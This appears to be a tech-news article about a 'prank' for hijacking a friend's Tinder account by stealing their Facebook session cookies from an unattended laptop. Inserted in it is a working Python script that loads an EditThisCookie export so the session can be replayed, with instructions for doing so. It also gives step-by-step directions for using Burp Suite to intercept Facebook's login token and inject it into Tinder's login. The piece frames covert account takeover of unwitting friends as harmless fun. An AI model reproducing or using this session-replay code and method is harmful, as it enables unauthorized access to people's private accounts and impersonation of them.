Easy Tinder prank hack lets you play stupid cupid

Engineer details method for 45-minute romp arranging dates for unwitting mates


Software engineer Robert Heaton has detailed simple tricks to fondle your mates' Tinder and Facebook accounts over the festive season.

Friendship, or at least physical proximity, is a prerequisite: the prank depends on a few minutes alone with the target's unattended laptop, from which the logged-in Facebook session cookies are copied, replayed in the prankster's own browser, and then used to complete Tinder's Facebook login on the prankster's iOS device.

In a detailed post Heaton said Tinder accounts could be hijacked using a little security knowledge and a few minutes of unattended machine time.

"You have discovered that all you need is a little time with his laptop's Facebook session and you can bust into his Tinder account on your phone," Heaton said.

"You can use this small window of opportunity to throw his Facebook session from his laptop onto yours, then continue with the next phase right under his oblivious nose.

"His session is in his browser cookies. You get his Facebook.com cookies, you get his session."

The prank used the Chrome extension EditThisCookie to export the target's Facebook cookies from Chrome as a JSON file, which could then be emailed to the prankster and imported into another browser. Because the session lives entirely in those cookies, this granted access to the target's Facebook account for as long as the session stayed valid, that is, until the target logged out, changed their password, or Facebook otherwise invalidated it.
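The cookie-replay step above, shown as an added example that is not Heaton's code or any code from the original article. It parses an export in EditThisCookie's JSON format into a standard-library cookie jar and shows which cookies would be attached to a request. The sample export is constructed (the cookie values are made up; only the names c_user and xs are real Facebook cookie names), and a deliberately expired entry is included to show that stale cookies are dropped rather than replayed.

```python
import json
import time
from http.cookiejar import Cookie, CookieJar
from urllib.request import Request

# Constructed sample in EditThisCookie's export format. Values are made up;
# the third entry is already expired and must not be replayed.
SAMPLE_EXPORT = """[
  {"domain": ".facebook.com", "expirationDate": 4102444800, "hostOnly": false,
   "httpOnly": true, "name": "c_user", "path": "/", "secure": true,
   "session": false, "storeId": "0", "value": "100000000000001", "id": 1},
  {"domain": ".facebook.com", "expirationDate": 4102444800, "hostOnly": false,
   "httpOnly": true, "name": "xs", "path": "/", "secure": true,
   "session": false, "storeId": "0",
   "value": "12%3Aexamplesessionsecret%3A2%3A1700000000", "id": 2},
  {"domain": ".facebook.com", "expirationDate": 1000000000, "hostOnly": false,
   "httpOnly": false, "name": "stale", "path": "/", "secure": true,
   "session": false, "storeId": "0", "value": "expired", "id": 3}
]"""


def load_editthiscookie_export(raw, now=None):
    """Parse an EditThisCookie JSON export into a CookieJar.

    Entries whose expirationDate is in the past are skipped, since the
    victim's browser would no longer send them either. `now` is injectable
    so the behaviour can be tested deterministically.
    """
    now = time.time() if now is None else now
    jar = CookieJar()
    for entry in json.loads(raw):
        expires = entry.get("expirationDate")
        if expires is not None and expires < now:
            continue  # expired: replaying it would not restore the session
        domain = entry["domain"]
        jar.set_cookie(Cookie(
            version=0,
            name=entry["name"],
            value=entry["value"],
            port=None, port_specified=False,
            domain=domain, domain_specified=True,
            domain_initial_dot=domain.startswith("."),
            path=entry.get("path", "/"), path_specified=True,
            secure=bool(entry.get("secure")),
            expires=None if expires is None else int(expires),
            discard=bool(entry.get("session")),
            comment=None, comment_url=None,
            # HttpOnly only stops JavaScript reading the cookie; an export
            # taken via the browser's cookie store is unaffected by it.
            rest={"HttpOnly": None} if entry.get("httpOnly") else {},
            rfc2109=False,
        ))
    return jar


def cookie_header_for(jar, url):
    """Return the Cookie header the jar would attach to a request for url.

    Returns None when nothing matches: wrong domain, or a Secure cookie
    that the jar refuses to send over plain http.
    """
    req = Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


if __name__ == "__main__":
    jar = load_editthiscookie_export(SAMPLE_EXPORT)
    print(cookie_header_for(jar, "https://www.facebook.com/"))
    print(cookie_header_for(jar, "http://www.facebook.com/"))
```

To actually replay the session, the same jar is handed to `urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))`; every request that opener makes to facebook.com then carries the stolen `c_user` and `xs` pair, which is all the server uses to recognise the victim. Note that the `HttpOnly` flag offers no protection here: it only hides the cookie from page JavaScript, not from someone with the browser's own cookie store in front of them.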

"Steve comes back, enormous sandwich in hand. But it's too late. You're in."

Tinder cupids keen to complete the attack should drop the sandwich, grab a copy of the Burp Suite web app security tool, install Burp's CA certificate on their phone and point the phone at the Burp proxy running on their computer, so the phone's HTTPS traffic can be read and modified in transit.

From there, Heaton advises punters to delete the iOS Facebook app from the phone before logging in to Tinder with Facebook. With the native app gone, Tinder falls back to a web-based Facebook login, which is what makes the whole exchange visible to the proxy, in a feat described as "man-in-the-middling yourself".

The login attempt generated an HTTP GET request to Facebook's authorisation page, which Burp Suite captured. That URL was then copied into the desktop browser already logged in to Facebook with the pinched cookies, where Facebook asked whether the (impersonated) victim would like to authorise Tinder.

Approving that prompt produced an HTTP POST request, also captured by Burp Suite, which could be examined to pull out the authentication token Facebook issues to Tinder as proof of login.

Using Burp Suite's intercept mode, that token could then be dropped into the corresponding response to the Tinder-Facebook login attempt still pending on the iOS device, so the Tinder app believed the victim's Facebook account had just authorised it and opened the victim's Tinder account.

"You did it. Tears of joy and relief streaming down your face, you change all of his photos to pictures of Gary Busey and start educating all of his matches about his deleterious personal hygiene."

Pranksters have roughly 45 minutes to enjoy their festive furtive free-for-all before, for reasons Heaton could not pin down, Facebook and Tinder punt them out of the hijacked session. ®


Biting the hand that feeds IT © 1998–2020